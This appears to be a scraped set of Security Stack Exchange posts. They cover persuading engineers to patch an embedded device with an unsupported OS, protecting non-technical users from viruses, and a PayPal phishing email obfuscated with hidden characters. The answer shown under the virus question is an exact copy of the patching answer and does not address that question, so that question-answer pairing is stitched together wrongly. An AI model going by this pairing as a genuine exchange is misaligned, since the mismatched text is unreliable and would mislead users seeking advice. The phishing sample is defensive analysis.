An operating system has reached End of Support (EoS) so no more security patches are coming for the OS ever. An embedded device running this OS needs to be updated to a newer version. However, the engineers who designed the original product feel that the machine is not hackable and therefore does not need to be patched. The device has WiFi, Ethernet, USB ports and an OS that has reached EoS. The questions I am asked daily: We have application white-listing so why do we need to patch vulnerabilities? We have a firewall so why do we need to patch vulnerabilities? And the comments I get: Our plan is to harden the system even more. If we do this then we should not have to update the OS and continue patching it. No one will be able to reach the vulnerabilities. Also we will fix the vulnerabilities in outward-facing parts of the OS (even though there is no ability for them to patch the vulnerabilities themselves) and then we can leave the non-outside facing vulnerabilities unpatched. I have explained in detail about Nessus credentialed scans. I am not sure how to get my point across to these engineers. Any thoughts on how I can explain this? UPDATE: The system is being patched. Thanks for everyones responses and help.
The trouble with the situation (as you are reporting it) is that there are a lot of assumptions being made with a lot of opinions. You have your opinions and you want them to share your opinions, but they have their own opinions. If you want to get everyone to agree to something, you need to find common ground. You need to challenge and confirm each assumption and find hard data to support your opinion or theirs. Once you have common ground, then you can all move forward together. You have whitelisting: great, what does that mean? Are there ways around it? Can a whitelisted application be corrupted? What does the firewall do? How is it configured? Firewalls mean blocked ports, but they also mean allowed ports. Can those allowed ports be abused? No one has access? Who has access to the device? Are you trusting an insider or the ignorance of a user to keep it secure? What happens if someone gets local access to the device? How likely is that? As an information security professional, your job is not to beat people over the head with "best practices" but to perform risk analyses and design a way forward that limits risk under the risk threshold in a cost-effective way. You have to justify not employing best practices, but if the justification is valid, then it's valid.
{ "source": [ "https://security.stackexchange.com/questions/175977", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166706/" ] }
175,983
I work as a data recovery consultant and a surprisingly large number of my clients are individuals that caught a virus from "The Internet" . A lot of people would browse dodgy websites, download all kinds of files and click on those big flashy DOWNLOAD buttons without hesitation. I always try to give some advice as to how to be more cautious in general and a more technical approach to use things like Add-Blocker, a good antivirus and up-to-date modern browser. Is there any more advanced approach for non-technical users to better protect against mass-targeted internet viruses.
The trouble with the situation (as you are reporting it) is that there are a lot of assumptions being made with a lot of opinions. You have your opinions and you want them to share your opinions, but they have their own opinions. If you want to get everyone to agree to something, you need to find common ground. You need to challenge and confirm each assumption and find hard data to support your opinion or theirs. Once you have common ground, then you can all move forward together. You have whitelisting: great, what does that mean? Are there ways around it? Can a whitelisted application be corrupted? What does the firewall do? How is it configured? Firewalls mean blocked ports, but they also mean allowed ports. Can those allowed ports be abused? No one has access? Who has access to the device? Are you trusting an insider or the ignorance of a user to keep it secure? What happens if someone gets local access to the device? How likely is that? As an information security professional, your job is not to beat people over the head with "best practices" but to perform risk analyses and design a way forward that limits risk under the risk threshold in a cost-effective way. You have to justify not employing best practices, but if the justification is valid, then it's valid.
{ "source": [ "https://security.stackexchange.com/questions/175983", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166711/" ] }
176,197
i recently received the following (rather obvious) phishing email: i'm not a PayPal user so this particularly un-alarming for me. however, when viewing as plain text, it became evident that there were hidden characters between every displayed letter of each word, as so: ------------------------------ ------------------------------ ---------- Statement your account has been updated successfully on 12:30:14 pm Friday, December 22, 2017 HzeglelMo, YmocuTr aMcacdoduvnbt cfhoannlgze1s sHuzcocXeysVsmfEudlIlKy cwh9a2nOgVead. TFhFe dHePt2aNi2lGs oZf thhte cThzaAnAgJe3s abr9e iIn aztbteaVcshsegd DLorwCnIlFo6ald aYn0d rgeuaid tchGe altjtFaScMhJepd YZobu w3inlWl fOiAnFd m5edsDs0aHgJe iQn A2dToebee RgefaEdAenr (kPyDKFV) AfwoHr1mraMtn. TuhsaunxkWs fjorr jXori1neienRg t6hKe mkimlAlci4oKn6s off pkeiospslLe w8h8o rIeGlDy oSn uNs tho mpatkEe s4e2csu3rie fFiqnNaXnsccikaEl thrtaEnOsia2cFt6iWocn2s a7rUoPuTned tLh1e wIoxr5lnd0. SIiTnocAefrSeVlWyd,W PVacy6Pka1l1bidttS0u4pjp0oErCtE.k HbeUlrp r|xddl8vSme5cKu6rQi8tcyoslnnfCte8nrtDrDe PcavyqPzaDlkix8tt(yEGuIrRodp9eP) S.à ri.jlH.IeSt C3i2ee, Sb.rC8.EAp.M SyobcHiété eOn CqoGmImwaBnmdhiYtfe plaAr AacNtkiIonXs. RoeSgPirsNtpe6rreWd oefGfJi1cteD: 212w-t2P4 BloJuJl5ejvBaYrmd R6oGykahl, Ls-c2S4r4r9 Lzulx1etmbb7u9rkg1. RKCHS LmuFxweCmUbyuLrmg BE 161t8 3V419a. what could this be for? has anyone ever seen this? UPDATE - here are the From + Subject headings From: [email protected] . Sent: Sunday, December 24, 2017 9:39 PM Subject: Case ID Number PP-M-LL0PUG4V : Statement your account has been updated successfully on 12:30:14 pm Friday, December 22, 2017
This is just regular malware spam. The evil part of this message is likely the attached PDF it mentions. It likely contains an exploit which targets a vulnerability in one or more PDF readers and does something bad if opened with a vulnerable program. So do not open the attachment. The reason for the gibberish text in the email's sourcecode is likely to confuse spam filters so they don't filter it.
{ "source": [ "https://security.stackexchange.com/questions/176197", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166998/" ] }